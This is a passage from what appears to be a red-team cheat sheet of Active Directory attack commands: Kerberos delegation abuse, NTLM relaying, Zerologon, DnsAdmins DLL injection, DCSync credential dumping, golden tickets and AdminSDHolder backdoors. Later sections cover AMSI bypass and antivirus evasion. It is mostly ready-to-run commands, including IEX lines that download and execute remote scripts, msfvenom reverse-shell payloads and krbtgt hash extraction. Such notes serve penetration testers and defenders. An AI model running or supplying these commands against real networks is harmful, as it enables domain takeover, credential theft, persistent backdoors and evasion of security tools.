/domain:megacorp.local /user:fakemachine1337 /password:Passw0rd! FC525C9683E8FE067095BA2DDC971889 ``` Ask TGS for CIFT and HTTP: ``` PS > .\Rubeus.exe s4u /domain:megacorp.local /user:fakemachine1337 /rc4:FC525C9683E8FE067095BA2DDC971889 /impersonateuser:DC01$ /msdsspn:CIFS/DC01.megacorp.local /altservice:HTTP /ptt PS > klist PS > cd \\DC01.megacorp.local\c$ PS > ls PS > c: PS > Enter-PSSession -ComputerName DC01.megacorp.local PS > exit ``` Ask TGS for LDAP: ``` PS > .\Rubeus.exe s4u /domain:megacorp.local /user:fakemachine1337 /rc4:FC525C9683E8FE067095BA2DDC971889 /impersonateuser:DC01$ /msdsspn:LDAP/DC01.megacorp.local /ptt PS > klist PS > ...DCSync... ``` Cleanup: ``` PowerView3 > Get-DomainComputer DC01.megacorp.local -Verbose -Credential $cred | Set-DomainObject -Clear 'msDS-AllowedToActOnBehalfOfOtherIdentity' -Verbose -Credential $cred ``` ##### PowerView 4.0 Configure RBCD on the vulnerable host (DC01): ``` PowerView4 > Set-DomainRBCD DC01 -DelegateFrom fakemachine1337 -Verbose ``` Cleanup: ``` PowerView4 > Set-DomainRBCD DC01 -Clear -Verbose ``` #### RBCD from Linux Add new machine account: ``` $ addcomputer.py -computer-name 'fakemachine1337' -computer-pass 'Passw0rd!' -dc-ip 10.10.13.37 -dc-host DC02.megacorp.local megacorp.local/snovvcrash:'Qwe123!@#' ``` Configure RBCD on the vulnerable host: ``` ...rbcd-attack... Or ...rbcd_permissions... ``` Ask TGS for LDAP: ``` $ getST.py -spn ldap/DC01.megacorp.local -impersonate 'DC01' -dc-ip 10.10.13.37 megacorp.local/fakemachine1337:'Passw0rd!' $ ...DCSync... ``` ##### rbcd-attack * [https://github.com/tothi/rbcd-attack](https://github.com/tothi/rbcd-attack) Configure RBCD on the vulnerable host (DC01): ``` $ ./rbcd.py -f fakemachine1337 -t DC01 -dc-ip 10.10.13.37 megacorp.local/snovvcrash:'Qwe123!@#' ``` ##### rbcd_permissions * [https://github.com/NinjaStyle82/rbcd_permissions](https://github.com/NinjaStyle82/rbcd_permissions) Configure RBCD on the vulnerable host (DC01) via PtH: ``` $ ./rbcd.py -t 'CN=dc01,OU=Domain Controllers,DC=megacorp,DC=local' -d megacorp.local -c 'CN=fakemachine1337,CN=Computers,DC=megacorp,DC=local' -u snovvcrash -H 79bfd1ab35c67c19715aea7f06da66ee:79bfd1ab35c67c19715aea7f06da66ee -l 10.10.13.37 ``` ##### Bronze Bit **CVE-2020-17049** * [https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory/](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory/) * [https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack/](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack/) * [https://gist.github.com/Kevin-Robertson/9e0f8bfdbf4c1e694e6ff4197f0a4372](https://gist.github.com/Kevin-Robertson/9e0f8bfdbf4c1e694e6ff4197f0a4372) ``` PS > Get-KerberosAESKey -Password 'Passw0rd!' -Salt MEGACORP.LOCALfakemachine1337 AES128 Key: 01C7B89A74F7AEC1007DED2F3DE0A815 AES256 Key: 211E8E3134ED797B0A2BF6C36D1A966B3BED2B24E4AAA9ECEED23D0ABF659E98 ``` ``` $ addcomputer.py -computer-name fakemachine1337 -computer-pass 'Passw0rd!' -dc-ip 10.10.13.37 -dc-host DC01.megacorp.local megacorp.local/snovvcrash:'Qwe123!@#' $ ./rbcd.py -t 'CN=dc01,OU=Domain Controllers,DC=megacorp,DC=local' -d megacorp.local -c 'CN=fakemachine1337,CN=Computers,DC=megacorp,DC=local' -u snovvcrash -H 79bfd1ab35c67c19715aea7f06da66ee:79bfd1ab35c67c19715aea7f06da66ee -l 10.10.13.37 $ getST.py -spn ldap/DC01.megacorp.local -impersonate 'administrator' -dc-ip 10.10.13.37 megacorp.local/fakemachine1337 -hashes :FC525C9683E8FE067095BA2DDC971889 -aesKey 211E8E3134ED797B0A2BF6C36D1A966B3BED2B24E4AAA9ECEED23D0ABF659E98 -force-forwardable $ secretsdump.py DC01.megacorp.local -just-dc-user 'MEGACORP\krbtgt' -dc-ip 10.10.13.37 -no-pass -k ``` #### DHCPv6 + WPAD + NTLM Relay + RBCD * [https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/](https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/) * [https://chryzsh.github.io/relaying-delegation/](https://chryzsh.github.io/relaying-delegation/) * [https://habr.com/ru/company/jetinfosystems/blog/449278/](https://habr.com/ru/company/jetinfosystems/blog/449278/) * [https://www.exploit-db.com/docs/48282](https://www.exploit-db.com/docs/48282) * [[PDF] From Zero Credential to Full Domain Compromise (Haboob Team)](https://drive.google.com/file/d/1htCGIt1Wcg53zCSGnRk4wfcKOk5A_YDP/view?usp=sharing) ``` $ ntlmrelayx.py -t ldaps://DC01.megacorp.local --delegate-access -wh attacker-wpad --no-smb-server --no-wcf-server --no-raw-server --no-dump --no-da --no-acl --no-validate-privs [-debug] $ sudo mitm6 -i eth0 -d megacorp.local --ignore-nofqdn ``` ## ADIDNS Abuse * [https://blog.netspi.com/exploiting-adidns/](https://blog.netspi.com/exploiting-adidns/) * [https://blog.netspi.com/adidns-revisited/](https://blog.netspi.com/adidns-revisited/) * [https://www.gosecure.net/blog/2019/02/20/abusing-unsafe-defaults-in-active-directory/](https://www.gosecure.net/blog/2019/02/20/abusing-unsafe-defaults-in-active-directory/) 0\. Load tools: ``` PS > IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/powermad.ps1") ``` 1\. Check if you are able to modify (add) AD DNS names: ``` PS > Get-ADIDNSZone -Credential $cred -Verbose DC=megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local DC=RootDNSServers,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local DC=_msdcs.megacorp.local,CN=MicrosoftDNS,DC=ForestDnsZones,DC=megacorp,DC=local DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=megacorp,DC=local PS > Get-ADIDNSPermission -Credential $cred -Verbose | ? {$_.Principal -eq 'NT AUTHORITY\Authenticated Users'} Principal : NT AUTHORITY\Authenticated Users IdentityReference : S-1-5-11 ActiveDirectoryRights : CreateChild InheritanceType : None ObjectType : 00000000-0000-0000-0000-000000000000 InheritedObjectType : 00000000-0000-0000-0000-000000000000 ObjectFlags : None AccessControlType : Allow IsInherited : False InheritanceFlags : None PropagationFlags : None ``` This `CreateChild` permission is what we need. 2\. Create, configure the new DNS name that could be likely exploited for spoofing with Attacker's IP and enable it. I chose `pc01` which was found in DNS cache: ``` PS > New-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose PS > $dnsRecord = New-DNSRecordArray -Type A -Data 10.10.13.37 PS > Set-ADIDNSNodeAttribute -Node pc01 -Attribute dnsRecord -Value $dnsRecord -Credential $cred -Verbose PS > Enable-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose ``` 3\. Check the newly created DNS object and try to resolve it. AD will need some time (\~180 seconds) to sync LDAP changes via its DNS dynamic updates protocol: ``` PS > Get-ADIDNSNodeAttribute -Node pc01 -Attribute dnsRecord -Credential $cred -Verbose PS > Resolve-DNSName pc01 PS > cmd /c ping -n 1 pc01 ``` 4\. Cleanup: ``` PS > Remove-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose ``` ## User Hunt * [http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/](http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/) * [https://www.slideshare.net/harmj0y/i-hunt-sys-admins-20](https://www.slideshare.net/harmj0y/i-hunt-sys-admins-20) ### Sessions Enum * [http://www.harmj0y.net/blog/powershell/powershell-and-win32-api-access/](http://www.harmj0y.net/blog/powershell/powershell-and-win32-api-access/) * [http://www.harmj0y.net/blog/powershell/powerquinsta/](http://www.harmj0y.net/blog/powershell/powerquinsta/) ### Derivative Local Admins * [http://www.harmj0y.net/blog/redteaming/local-group-enumeration/](http://www.harmj0y.net/blog/redteaming/local-group-enumeration/) * [https://medium.com/@sixdub/derivative-local-admin-cdd09445aac8](https://medium.com/@sixdub/derivative-local-admin-cdd09445aac8) * [https://wald0.com/?p=14](https://wald0.com/?p=14) * [http://www.offensiveops.io/tools/bloodhound-working-with-results/](http://www.offensiveops.io/tools/bloodhound-working-with-results/) * [[PDF] Pen Testing Active Directory Environments (Varonis)](https://drive.google.com/file/d/1OePiNlfL8-ZvbS0Ou27StfSJK6C2vA_J/view?usp=sharing) ## PrivExchange **CVE-2019-0686, CVE-2019-0724** * [https://github.com/dirkjanm/PrivExchange](https://github.com/dirkjanm/PrivExchange) * [https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/) Check: * [https://twitter.com/_wald0/status/1091062691383238656](https://twitter.com/_wald0/status/1091062691383238656) ``` $ sudo ./Responder.py -I eth0 -Av $ python privexchange.py -d MEGACORP -u snovvcrash -p 'Passw0rd!' -ah 10.10.13.37 -ap '/test/test/test' exch01.megacorp.local --debug ``` Exploit: ``` $ sudo ntlmrelayx.py -t ldap://DC01.megacorp.local --escalate-user snovvcrash $ python privexchange.py -d MEGACORP -u snovvcrash -p 'Passw0rd!' -ah 10.10.13.37 exch01.megacorp.local --debug ``` ## Zerologon **CVE-2020-1472** * [https://www.secura.com/uploads/whitepapers/Zerologon.pdf](https://www.secura.com/uploads/whitepapers/Zerologon.pdf) * [https://twitter.com/_dirkjan/status/1306280566313156608](https://twitter.com/_dirkjan/status/1306280566313156608) Check: * [https://github.com/SecuraBV/CVE-2020-1472](https://github.com/SecuraBV/CVE-2020-1472) ``` $ ./zerologon_tester.py DC01 10.10.13.38 ``` Exploit: * [https://github.com/dirkjanm/CVE-2020-1472](https://github.com/dirkjanm/CVE-2020-1472) * [https://github.com/blackarrowsec/redteam-research/tree/master/CVE-2020-1472](https://github.com/blackarrowsec/redteam-research/tree/master/CVE-2020-1472) Exploits above **will break the domain!** Use this technique by @dirkjanm to abuse Zerologon safely: * [https://dirkjanm.io/a-different-way-of-abusing-zerologon/](https://dirkjanm.io/a-different-way-of-abusing-zerologon/) ``` $ sudo ntlmrelayx.py -t dcsync://DC01.megacorp.local -smb2support $ ./dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 DC02.megacorp.local ``` ## DnsAdmins * [https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83](https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83) * [http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html](http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html) * [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise) * [https://adsecurity.org/?p=4064](https://adsecurity.org/?p=4064) Exploit: ``` $ msfvenom -p windows/x64/exec cmd='c:\users\snovvcrash\documents\nc.exe 127.0.0.1 1337 -e powershell' -f dll > inject.dll PS > dnscmd.exe <HOSTNAME> /Config /ServerLevelPluginDll c:\users\snovvcrash\desktop\i.dll PS > Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll PS > (sc.exe \\<HOSTNAME> stop dns) -and (sc.exe \\<HOSTNAME> start dns) ``` Cleanup: ``` PS > reg delete HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDll PS > (sc.exe \\<HOSTNAME> stop dns) -and (sc.exe \\<HOSTNAME> start dns) ``` ## Azure ### ADSync * [https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Azure-ADConnect.ps1](https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Azure-ADConnect.ps1) * [https://blog.xpnsec.com/azuread-connect-for-redteam/](https://blog.xpnsec.com/azuread-connect-for-redteam/) ``` PS > Azure-ADConnect -server 127.0.0.1 -db ADSync ``` ## LAPS ### Enabled? Check locally: ``` PS > gc "c:\program files\LAPS\CSE\Admpwd.dll" PS > Get-FileHash "c:\program files\LAPS\CSE\Admpwd.dll" PS > Get-AuthenticodeSignature "c:\program files\LAPS\CSE\Admpwd.dll" ``` Check in LDAP: ``` PowerView3 > Get-DomainObject "CN=ms-Mcs-AdmPwd,CN=Schema,CN=Configuration,DC=megacorp,DC=local" PowerView3 > Get-DomainObject "CN=ms-Mcs-AdmPwdExpirationTime,CN=Schema,CN=Configuration,DC=megacorp,DC=local" ``` ## DCSync ### Mimikatz ``` mimikatz # lsadump::dcsync /domain:megacorp.local /user:MEGACORP\krbtgt mimikatz # lsadump::dcsync /domain:megacorp.local /user:[email protected] ``` ### Invoke-DCSync.ps1 * [https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/credentials/Invoke-DCSync.ps1](https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/credentials/Invoke-DCSync.ps1) ``` PS > Invoke-DCSync -GetComputers -Domain megacorp.local -DomainController DC01.megacorp.local ``` ### secretsdump.py ``` $ secretsdump.py MEGACORP/snovvcrash:'Passw0rd!'@DC01.megacorp.local -dc-ip 10.10.13.37 -just-dc-user 'MEGACORP\krbtgt' $ secretsdump.py DC01.megacorp.local -dc-ip 10.10.13.37 -just-dc-user 'MEGACORP\krbtgt' -k -no-pass ``` ## Attack Trusts * [http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/](http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/) * [http://www.harmj0y.net/blog/redteaming/domain-trusts-were-not-done-yet/](http://www.harmj0y.net/blog/redteaming/domain-trusts-were-not-done-yet/) * [http://www.harmj0y.net/blog/redteaming/domain-trusts-why-you-should-care/](http://www.harmj0y.net/blog/redteaming/domain-trusts-why-you-should-care/) * [https://habr.com/ru/company/jetinfosystems/blog/466445/](https://habr.com/ru/company/jetinfosystems/blog/466445/) Enum foreign users and groups: ``` PowerView3 > Get-DomainTrust -Domain megacorp.com PowerView3 > Get-DomainForeignGroupMember -Domain megacorp.com PowerView3 > Get-DomainForeignUser -Domain megacorp.com ``` ### sIDHistory/ExtraSids Hopping * [http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/](http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/) * [http://www.harmj0y.net/blog/redteaming/the-trustpocalypse/](http://www.harmj0y.net/blog/redteaming/the-trustpocalypse/) Use PowerView to enumerate domain trusts: ``` PowerView2 > Get-NetForestDomain Forest : megacorp.local DomainControllers : {DC03.megacorp.local, DC04.megacorp.local} Children : {child.megacorp.local} DomainMode : Windows2012R2Domain DomainModeLevel : 6 Parent : PdcRoleOwner : DC03.megacorp.local RidRoleOwner : DC03.megacorp.local InfrastructureRoleOwner : DC03.megacorp.local Name : megacorp.local Forest : megacorp.local DomainControllers : {DC01.child.megacorp.local, DC02.child.megacorp.local} Children : {} DomainMode : Windows2012R2Domain DomainModeLevel : 6 Parent : megacorp.local PdcRoleOwner : DC01.child.megacorp.local RidRoleOwner : DC01.child.megacorp.local InfrastructureRoleOwner : DC01.child.megacorp.local Name : child.megacorp.local PowerView2 > Invoke-MapDomainTrust SourceDomain TargetDomain TrustType TrustDirection ------------ ------------ --------- -------------- child.megacorp.local megacorp.local ParentChild Bidirectional child.megacorp.local megacorp.com External Bidirectional megacorp.com child.megacorp.local External Bidirectional megacorp.local child.megacorp.local ParentChild Bidirectional ``` Exploiting Bidirectional-ParentChild trust between child.megacorp.local <-> megacorp.local. For creating a cross-trust golden ticket we'll need: 1. child domain FQDN (`child.megacorp.local`); 2. name of the child domain's DC machine account and its RID (`DC01$`, `31337`); 3. the SID of the child domain (`S-1-5-21-4266912945-3985045794-2943778634`); 4. the SID of the parent domain (`S-1-5-21-2284550090-1208917427-1204316795`); 5. compomised krbtgt hash from the child domain (`00ff00ff00ff00ff00ff00ff00ff00ff`); 6. ??? 7. PROFIT. ``` 1. PS > $env:userdnsdomain child.megacorp.local 2. PowerView2 > Get-NetComputer -FullData DC01.child.megacorp.local | Select ObjectSID S-1-5-21-4266912945-3985045794-2943778634-31337 3. PowerView2 > Get-DomainSID S-1-5-21-4266912945-3985045794-2943778634 4. PS > (New-Object System.Security.Principal.NTAccount("megacorp.local","krbtgt")).Translate([System.Security.Principal.SecurityIdentifier]).Value S-1-5-21-2284550090-1208917427-1204316795-502 ``` Create cross-trust golden ticket: ``` mimikatz # kerberos::golden /domain:child.megacorp.local /user:DC01$ /id:31337 /groups:516 /sid:S-1-5-21-4266912945-3985045794-2943778634 /sids:S-1-5-21-2284550090-1208917427-1204316795-516,S-1-5-9 /krbtgt:00ff00ff00ff00ff00ff00ff00ff00ff /ptt Or $ ticketer.py -nthash 00ff00ff00ff00ff00ff00ff00ff00ff -user-id 31337 -groups 516 -domain child.megacorp.local -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -extra-sid S-1-5-21-2284550090-1208917427-1204316795-516,S-1-5-9 'DC01' ``` For DCSyncing we'll need only parent domain FQDN (`megacorp.local`): ``` PS > ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest())[0].RootDomain.Name megacorp.local ``` DCSync: ``` mimikatz # lsadump::dcsync /user:megacorp.local\krbtgt /domain:megacorp.local ``` ### UnD + PrinterBug * [https://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/](https://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/) * [https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1) * [https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#breaking-forest-trusts](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet#breaking-forest-trusts) * [https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Spoolsample.ps1](https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Spoolsample.ps1) * [https://github.com/BlackDiverX/WinTools/blob/master/SpoolSample-Printerbug/SpoolSample.exe](https://github.com/BlackDiverX/WinTools/blob/master/SpoolSample-Printerbug/SpoolSample.exe) ### Visualization (yEd) * [http://www.harmj0y.net/blog/redteaming/domain-trusts-why-you-should-care/](http://www.harmj0y.net/blog/redteaming/domain-trusts-why-you-should-care/) * [https://github.com/HarmJ0y/TrustVisualizer](https://github.com/HarmJ0y/TrustVisualizer) * [https://www.yworks.com/products/yed](https://www.yworks.com/products/yed) ``` PowerView3 > Invoke-MapDomainTrust | Export-Csv -NoTypeInformation trusts.csv $ git clone https://github.com/HarmJ0y/TrustVisualizer $ python -m pip install networkx --proxy http://127.0.0.1:8090 $ ./TrustVisualizer.py trusts.csv ``` ## Persistence ### Golden Ticket #### impacket ``` $ ticketer.py -nthash 00ff00ff00ff00ff00ff00ff00ff00ff -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -domain megacorp.local snovvcrash $ export KRB5CCNAME=`pwd`/snovvcrash.ccache $ psexec.py megacorp.local/[email protected] -k -no-pass $ secretsdump.py megacorp.local/[email protected] -dc-ip 10.10.13.37 -just-dc-user 'MEGACORP\krbtgt' -k -no-pass ``` ### AdminSDHolder Modification * [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence) * [https://attack.stealthbits.com/adminsdholder-modification-ad-persistence](https://attack.stealthbits.com/adminsdholder-modification-ad-persistence) #### Create a Backdoor Add a new domain user or grant an existent user `GenericAll` permissions for the `AdminSDHolder` container: ``` PowerView3 > Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=megacorp,DC=local" -TargetDomain megacorp.local -PrincipalIdentity snovvcrash -PrincipalDomain megacorp.local -Rights All -Verbose ``` Check that granting `AdminSDHolder` permissions was successfull (may take 60+ minutes for the security ACLs to get updated for that user): ``` PowerView3 > Get-DomainUser snovvcrash | select objectsid S-1-5-21-2284550090-1208917427-1204316795-9824 PowerView3 > Get-DomainObjectAcl -Identity "CN=AdminSDHolder,CN=System,DC=megacorp,DC=local" -Domain megacorp.local -ResolveGUIDs | ? {$_.SecurityIdentifier -eq "S-1-5-21-2284550090-1208917427-1204316795-9824"} AceType : AccessAllowed ObjectDN : CN=AdminSDHolder,CN=System,DC=megacorp,DC=local ActiveDirectoryRights : GenericAll OpaqueLength : 0 ObjectSID : InheritanceFlags : None BinaryLength : 36 IsInherited : False IsCallback : False PropagationFlags : None SecurityIdentifier : S-1-5-21-2284550090-1208917427-1204316795-9824 AccessMask : 983551 AuditFlags : None AceFlags : None AceQualifier : AccessAllowed ``` Now you can add yourself (the "snovvcrash" user) to the Domain Admins group any time and do stuff (actually adding the user to Domain Admins every time is not necessary, as the `AdminCount` attribute will stay `1` anyways after adding the backdoor user to a protected group for the first time): ``` PowerView3 > Add-DomainGroupMember -Identity "Domain Admins" -Members snovvcrash PowerView3 > Get-DomainObjectAcl -Identity "Domain Admins" -Domain megacorp.local -ResolveGUIDs | ? {$_.SecurityIdentifier -eq "S-1-5-21-2284550090-1208917427-1204316795-9824"} AceType : AccessAllowed ObjectDN : CN=Domain Admins,CN=Users,DC=megacorp,DC=local ActiveDirectoryRights : GenericAll OpaqueLength : 0 ObjectSID : S-1-5-21-2284550090-1208917427-1204316795-512 InheritanceFlags : None BinaryLength : 36 IsInherited : False IsCallback : False PropagationFlags : None SecurityIdentifier : S-1-5-21-2284550090-1208917427-1204316795-9824 AccessMask : 983551 AuditFlags : None AceFlags : None AceQualifier : AccessAllowed PowerView3 > Remove-DomainGroupMember -Identity "Domain Admins" -Members snovvcrash PowerView3 > Get-DomainUser snovvcrash | select admincount admincount ---------- 1 ``` #### Remove the Backdoor * [https://www.reddefenseglobal.com/blog/microsoft-domain-attack-techniques/admincount/](https://www.reddefenseglobal.com/blog/microsoft-domain-attack-techniques/admincount/) * [https://www.ucunleashed.com/1621](https://www.ucunleashed.com/1621) Disable or remove the account (if a new user was created): ``` PS > net user snovvcrash /domain /active:no PS > net user snovvcrash /domain /del ``` Remove user AdminSDHolder container via GUI (ADUC, dsa.msc). Clear the `AdminCount` attribute (will be resetted if the user is still in the `AdminSDHolder` container): ``` PowerView3 > Set-DomainObject -Identity snovvcrash -Domain megacorp.local -Clear admincount -Verbose Or PS > Get-ADUser snovvcrash | Set-ADObject -Clear admincount ``` Fix the inheritance rules: ``` PS > [bool]$isProtected = $false PS > [bool]$PreserveInheritance = $true PS > [string]$dn = (Get-ADUser snovvcrash).DistinguishedName PS > $user = [ADSI]"LDAP://$dn" PS > $acl = $user.objectSecurity PS > $acl.AreAccessRulesProtected True # procced if True PS > $acl.SetAccessRuleProtection($isProtected, $PreserveInheritance) PS > $inherited = $acl.AreAccessRulesProtected PS > $user.commitchanges() PS > $acl.AreAccessRulesProtected False ``` ## Misc List all domain users: ``` PS > Get-ADUser -Filter * -SearchBase "DC=megacorp,DC=local" | select Name,SID Or PS > net user /domain ``` List all domain groups: ``` PS > Get-ADGroup -Filter * -SearchBase "DC=megacorp,DC=local" | select Name,SID Or PS > net group /domain ``` List all user's groups: ``` PS > Get-ADPrincipalGroupMembership snovvcrash | select Name ``` Create new domain user: ``` PS > net user snovvcrash Passw0rd! /add /domain Or PS > New-ADUser -Name snovvcrash -SamAccountName snovvcrash -Path "CN=Users,DC=megacorp,DC=local" -AccountPassword(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) -Enabled $true ``` Create new local user and add him to local admins: ``` PS > net user testuser Passw0rd! /add PS > net localgroup administrators testuser /add ``` List deleted AD objects (AD recycle bin): * [https://activedirectorypro.com/enable-active-directory-recycle-bin-server-2016/](https://activedirectorypro.com/enable-active-directory-recycle-bin-server-2016/) * [https://blog.stealthbits.com/active-directory-object-recovery-recycle-bin/](https://blog.stealthbits.com/active-directory-object-recovery-recycle-bin/) ``` PS > Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects PS > Get-ADObject -LDAPFilter "(objectClass=User)" -SearchBase '<DISTINGUISHED_NAME>' -IncludeDeletedObjects -Properties * | ft -autosize -wrap ``` # AMSI Bypass * [AMSI.fail](https://amsi.fail/) * [https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell) * [https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/](https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/) * [https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/](https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/) ## Evil-WinRM + IEX ``` *Evil-WinRM* PS > menu *Evil-WinRM* PS > Bypass-4MSI *Evil-WinRM* PS > IEX([Net.Webclient]::new().DownloadString("http://127.0.0.1/PowerView.ps1")) ``` ## Memory Patching * [0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html](https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html) ``` PS > IEX(New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/snovvcrash/5c9ee38bb9a8802a674ec3d3d33b4717/raw/5c77510505f505db8ac1453c60ee6fc34a8e6d59/Bypass-AMSI.ps1') PS > Bypass-AMSI ``` # AV Evasion * [https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/](https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/) * [https://codeby.net/threads/meterpreter-snova-v-dele-100-fud-with-metasploit-5.66730/](https://codeby.net/threads/meterpreter-snova-v-dele-100-fud-with-metasploit-5.66730/) * [https://github.com/phackt/stager.dll](https://github.com/phackt/stager.dll) * [https://hausec.com/2019/02/09/suck-it-windows-defender/](https://hausec.com/2019/02/09/suck-it-windows-defender/) * [https://medium.com/securebit/bypassing-av-through-metasploit-loader-32-bit-6d62930151ad](https://medium.com/securebit/bypassing-av-through-metasploit-loader-32-bit-6d62930151ad) * [https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8](https://medium.com/securebit/bypassing-av-through-metasploit-loader-64-bit-9abe55e3e0c8) * [https://xakep.ru/2020/12/23/shikata-ga-nai/](https://xakep.ru/2020/12/23/shikata-ga-nai/) * [https://infosecwriteups.com/evade-avs-edr-with-shellcode-injection-159dde4dba1a?gi=84db9a8c5c5f](https://infosecwriteups.com/evade-avs-edr-with-shellcode-injection-159dde4dba1a?gi=84db9a8c5c5f) ## msfvenom ``` $ msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 -a x86 --platform win -e x86/shikata_ga_nai -i 3 -f exe -o rev.exe $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=1337 -e x86/shikata_ga_nai -i 9 -f raw | msfvenom --platform windows -a x86 -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -k -f exe -o met.exe ``` ## Veil-Evasion Hyperion + Pescramble ``` $ wine hyperion.exe input.exe output.exe $ wine PEScrambler.exe -i input.exe -o output.exe ``` ## Shelter * [https://www.shellterproject.com/](https://www.shellterproject.com/) ## GreatSCT Install and generate a payload: ``` $ git clone https://github.com/GreatSCT/GreatSCT ~/tools/GreatSCT $ cd ~/tools/GreatSCT/setup $ ./setup.sh $ cd .. && ./GreatSCT.py ...generate a payload... $ ls -la /usr/share/greatsct-output/handlers/payload.{rc,xml} $ msfconsole -r /usr/share/greatsct-output/handlers/payload.rc ``` Exec with `msbuild.exe` and get a shell: ``` PS > cmd /c C:\Windows\Microsoft.NET\framework\v4.0.30319\msbuild.exe payload.xml ``` * [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT) * [https://www.youtube.com/watch?v=krC5j1Ab44I&t=3730s](https://www.youtube.com/watch?v=krC5j1Ab44I&t=3730s) ## Invoke-Obfuscation * [https://github.com/danielbohannon/Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation) * [https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide](https://www.danielbohannon.com/blog-1/2017/12/2/the-invoke-obfuscation-usage-guide) ## Out-EncryptedScript.ps1 * [https://github.com/PowerShellMafia/PowerSploit/blob/master/ScriptModification/Out-EncryptedScript.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/master/ScriptModification/Out-EncryptedScript.ps1) * [https://powersploit.readthedocs.io/en/latest/ScriptModification/Out-EncryptedScript/](https://powersploit.readthedocs.io/en/latest/ScriptModification/Out-EncryptedScript/) ``` PS > Out-EncryptedScript .\script.ps1 $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force) s4lt -FilePath .\evil.ps1 PS > [string] $cmd = gc .\evil PS > $dec = de "Passw0rd!" s4lt PS 